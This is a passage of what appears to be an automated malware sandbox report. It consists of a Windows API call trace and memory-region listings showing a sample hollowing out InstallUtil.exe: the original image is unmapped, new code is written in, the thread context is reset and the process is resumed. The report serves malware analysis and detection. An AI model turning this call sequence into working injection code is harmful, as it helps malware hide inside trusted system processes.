dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19d4f8, hNewToken=0x0 | out: lpProcessInformation=0x19d4f8*(hProcess=0x2fc, hThread=0x290, dwProcessId=0x9c8, dwThreadId=0xafc), hNewToken=0x0) returned 1 [0204.761] NtGetContextThread (in: ThreadHandle=0x290, Context=0x19d228 | out: Context=0x19d228*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x374000, Edx=0x0, Ecx=0x0, Eax=0x407172, Ebp=0x0, Eip=0x778a8fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0204.799] NtReadVirtualMemory (in: ProcessHandle=0x2fc, BaseAddress=0x374008, Buffer=0x19d21c, NumberOfBytesToRead=0x4, NumberOfBytesRead=0x0 | out: Buffer=0x19d21c*, NumberOfBytesRead=0x0) returned 0x0 [0204.842] NtUnmapViewOfSection (ProcessHandle=0x2fc, BaseAddress=0x400000) returned 0x0 [0204.846] NtAllocateVirtualMemory (in: ProcessHandle=0x2fc, BaseAddress=0x19d210*=0x400000, ZeroBits=0x0, RegionSize=0x19d54c*=0x20000, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x19d210*=0x400000, RegionSize=0x19d54c*=0x20000) returned 0x0 [0204.853] NtProtectVirtualMemory (in: ProcessHandle=0x2fc, BaseAddress=0x19d210*=0x400000, NumberOfBytesToProtect=0x19d54c, NewAccessProtection=0x40, OldAccessProtection=0x19d208 | out: BaseAddress=0x19d210*=0x400000, NumberOfBytesToProtect=0x19d54c, OldAccessProtection=0x19d208*=0x4) returned 0x0 [0205.297] GetCurrentProcess () returned 0xffffffff [0205.297] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19d200*=0x0, ZeroBits=0x0, RegionSize=0x19d54c*=0x20000, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x19d200*=0x6a0000, RegionSize=0x19d54c*=0x20000) returned 0x0 [0205.298] GetCurrentProcess () returned 0xffffffff [0205.298] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19d200*=0x6a0000, NumberOfBytesToProtect=0x19d54c, NewAccessProtection=0x40, OldAccessProtection=0x19d208 | out: BaseAddress=0x19d200*=0x6a0000, NumberOfBytesToProtect=0x19d54c, OldAccessProtection=0x19d208*=0x4) returned 0x0 [0205.351] NtWriteVirtualMemory (in: ProcessHandle=0x2fc, BaseAddress=0x400000, Buffer=0x6a0000*, NumberOfBytesToWrite=0x20000, NumberOfBytesWritten=0x19d1c0 | out: Buffer=0x6a0000*, NumberOfBytesWritten=0x19d1c0*=0x20000) returned 0x0 [0205.992] NtWriteVirtualMemory (in: ProcessHandle=0x2fc, BaseAddress=0x374008, Buffer=0x19d1b8*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x19d1c0 | out: Buffer=0x19d1b8*, NumberOfBytesWritten=0x19d1c0*=0x4) returned 0x0 [0206.056] NtSetContextThread (ThreadHandle=0x290, Context=0x19d228*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x374000, Edx=0x0, Ecx=0x0, Eax=0x41bc9e, Ebp=0x0, Eip=0x778a8fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0206.090] NtResumeProcess (ProcessHandle=0x2fc) returned 0x0 [0206.468] GetCurrentProcess () returned 0xffffffff [0206.468] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19d200*=0x6a0000, RegionSize=0x19d54c, FreeType=0x8000) returned 0x0 [0206.553] NtClose (Handle=0x290) returned 0x0 [0206.553] NtClose (Handle=0x2fc) returned 0x0 [0206.924] GetCurrentProcess () returned 0xffffffff [0206.924] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19ecf0*=0x6a0000, RegionSize=0x19ecf4, FreeType=0x8000) returned 0xc00000a0 [0206.925] GetCurrentProcess () returned 0xffffffff [0206.925] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xee589c*=0x2790000, RegionSize=0xee4f7c, FreeType=0x8000) returned 0x0 [0212.964] GetModuleHandleW (lpModuleName=0x0) returned 0x1200000 [0213.034] GetModuleHandleW (lpModuleName=0x0) returned 0x1200000 [0213.162] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e09c8 | out: hHeap=0x6d0000) returned 1 [0213.255] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e4c80 | out: hHeap=0x6d0000) returned 1 [0213.255] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x77730000 [0213.256] GetProcAddress (hModule=0x77730000, lpProcName="AppPolicyGetProcessTerminationMethod") returned 0x0 [0213.256] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x19fa9c | out: phModule=0x19fa9c) returned 0 [0213.256] ExitProcess (uExitCode=0x19f91c) [0213.347] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5705a8 | out: hHeap=0x570000) returned 1 [0213.439] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e3538 | out: hHeap=0x6d0000) returned 1 Thread: id = 2 os_tid = 0xf48 Thread: id = 3 os_tid = 0xda8 Thread: id = 4 os_tid = 0x1220 Thread: id = 5 os_tid = 0x121c Process: id = "2" image_name = "installutil.exe" filename = "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\installutil.exe" page_root = "0x28347000" os_pid = "0x9c8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb5c" cmd_line = "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe\"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 644 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 645 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 646 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 647 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 648 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 649 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 650 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 651 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 652 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 653 start_va = 0x400000 end_va = 0x40bfff monitored = 0 entry_point = 0x407172 region_type = mapped_file name = "installutil.exe" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\installutil.exe") Region: id = 654 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 655 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 656 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 657 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 658 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 659 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 660 start_va = 0x400000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 662 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 663 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 664 start_va = 